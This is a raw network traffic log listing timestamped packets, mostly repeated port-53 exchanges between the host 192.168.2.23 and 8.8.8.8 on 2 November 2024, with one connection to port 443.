Nov 2, 2024 03:57:27.137681007 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:27.137703896 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:27.137749910 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:27.142426968 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:27.142462015 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:27.731358051 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:27.731499910 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:27.731889963 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:27.731936932 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:28.739887953 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:28.740145922 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:28.744710922 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:28.744927883 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:28.864679098 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:28.864913940 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:29.875040054 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:29.875564098 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:29.879874945 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:29.880335093 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:30.000118017 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:30.000205040 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:30.000368118 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:30.000380039 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:31.008903980 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:31.009088993 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:31.014029026 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:31.014039993 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:31.134973049 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:31.135091066 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:32.144408941 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:32.144910097 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:32.149362087 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:32.149744034 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:32.269361973 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:32.269613028 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:32.269689083 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:32.269756079 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:33.278618097 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:33.278948069 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:33.283462048 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:33.283690929 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:33.404954910 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:33.405150890 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:34.413705111 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:34.414551973 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:34.418536901 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:34.419325113 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:34.538054943 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:34.538291931 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:34.538803101 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:34.538851023 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:35.544514894 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:35.544703007 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:35.549335003 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:35.549451113 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:35.669122934 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:35.669133902 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:35.669205904 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:35.669207096 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:36.674302101 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:36.674587965 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:36.679224014 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:36.679306984 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:36.799624920 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:36.799707890 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:37.807739019 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:37.808197975 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:37.812540054 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:37.812977076 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:37.932183027 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:37.932193995 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:37.932279110 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:37.932302952 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:38.939394951 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:38.939686060 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:38.944329023 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:38.944418907 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:39.064163923 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:39.064223051 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:39.064227104 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:39.064268112 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:40.070782900 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:40.070977926 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:40.075700045 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:40.075715065 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:40.195641041 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:40.195651054 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:40.195704937 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:40.195738077 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:41.203780890 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:41.204123020 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:41.209373951 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:41.209897041 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:41.330724955 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:41.330786943 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:42.336488008 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:42.336704969 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:42.341336966 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:42.341480017 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:42.471040010 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:42.471134901 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:43.476406097 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:43.476766109 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:43.482994080 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:43.483006001 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:43.603250027 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:43.603441000 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:44.608891964 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:44.608925104 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:44.615092039 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:44.615128994 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:44.733880043 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:44.733894110 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:44.734076977 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:44.734076977 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:45.739310026 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:45.740014076 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:45.744131088 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:45.744786024 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:45.864896059 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:45.864955902 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:45.865186930 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:45.865225077 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:46.437920094 CET	43928	443	192.168.2.23	91.189.91.42
Nov 2, 2024 03:57:46.872975111 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:46.873446941 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:46.877759933 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:46.878180027 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:46.997454882 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:46.997682095 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:46.998492956 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:46.998555899 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:48.005405903 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:48.005749941 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:48.010776043 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:48.010788918 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:48.130426884 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:48.130553007 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:48.171135902 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:48.171199083 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:49.178195000 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:49.179927111 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:49.183015108 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:49.184659004 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:49.302872896 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:49.303034067 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:49.304436922 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:49.304492950 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:50.313019991 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:50.313484907 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:50.317840099 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:50.318263054 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:50.437532902 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:50.437566042 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:50.437638044 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:50.437664032 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:51.447441101 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:51.448535919 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:51.452287912 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:51.453325033 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:51.573020935 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:51.573096037 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:51.573554039 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:51.573611021 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:52.582350969 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:52.582736015 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:52.587239981 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:52.587493896 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:52.708378077 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:52.708549976 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:53.714848995 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:53.715341091 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:53.719710112 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:53.720125914 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:53.841845036 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:53.841856956 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:53.841969013 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:53.841981888 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:54.847924948 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:54.848346949 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:54.852755070 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:54.853060961 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:54.972687960 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:54.972698927 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:54.972759962 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:54.972794056 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:55.978302002 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:55.978504896 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:55.983180046 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:55.983270884 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:56.102722883 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:56.102794886 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:56.102811098 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:56.102869034 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:57.108149052 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:57.108403921 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:57.113030910 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:57.113240957 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:57.232836008 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:57.232928991 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:58.238610983 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:58.238795042 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:58.243453979 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:58.243571997 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:58.364088058 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:58.364099979 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:58.364178896 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:58.364191055 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:59.370474100 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:59.370718002 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:59.375333071 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:59.375464916 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:59.494782925 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:59.494884014 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:57:59.494915009 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:57:59.494966030 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:00.500099897 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:00.500475883 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:00.504928112 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:00.505261898 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:00.625444889 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:00.625459909 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:00.625597000 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:00.625633955 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:01.630590916 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:01.632353067 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:01.635443926 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:01.637096882 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:01.756555080 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:01.756664038 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:02.223149061 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:02.223239899 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:03.227480888 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:03.227590084 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:03.232342958 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:03.232352972 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:03.352231979 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:03.352288961 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:03.352639914 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:03.352714062 CET	42170	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:03.357474089 CET	53	42170	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:04.361457109 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:04.366381884 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:04.366494894 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:04.366494894 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:04.366548061 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:04.371439934 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:04.371452093 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:04.982444048 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:04.982461929 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:04.982755899 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:04.982755899 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:05.988063097 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:05.988179922 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:05.993045092 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:05.993057966 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:06.118737936 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:06.119086981 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:06.119096994 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:06.119328022 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:07.123496056 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:07.123497009 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:07.128427029 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:07.128437042 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:07.253063917 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:07.253175974 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:08.256674051 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:08.256725073 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:08.261548996 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:08.261559010 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:08.386280060 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:08.386370897 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:09.390619993 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:09.390863895 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:09.395576954 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:09.395682096 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:09.521445990 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:09.521456957 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:09.521537066 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:09.521538019 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:10.525909901 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:10.526153088 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:10.530715942 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:10.530949116 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:10.654257059 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:10.654319048 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:10.654369116 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:10.654369116 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:11.661650896 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:11.663114071 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:11.666501999 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:11.667908907 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:11.790368080 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:11.790683985 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:11.791938066 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:11.792001009 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:12.798181057 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:12.799035072 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:12.803005934 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:12.803780079 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:12.926843882 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:12.927076101 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:12.927447081 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:12.927530050 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:13.932859898 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:13.933038950 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:13.937649965 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:13.937747955 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:14.061269045 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:14.061484098 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:15.068079948 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:15.068319082 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:15.072932005 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:15.073097944 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:15.198488951 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:15.198659897 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:16.204766035 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:16.205183029 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:16.209657907 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:16.210066080 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:16.333386898 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:16.333405972 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:16.333625078 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:16.333720922 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:17.339605093 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:17.339936972 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:17.344450951 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:17.344739914 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:17.472820997 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:17.473112106 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:18.480119944 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:18.480370998 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:18.484906912 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:18.485127926 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:18.609258890 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:18.609410048 CET	53	42236	8.8.8.8	192.168.2.23
Nov 2, 2024 03:58:18.609411001 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:18.609513998 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:19.615665913 CET	42236	53	192.168.2.23	8.8.8.8
Nov 2, 2024 03:58:19.616040945 CET	42236	53	192.168.2.23	8.8.8.8
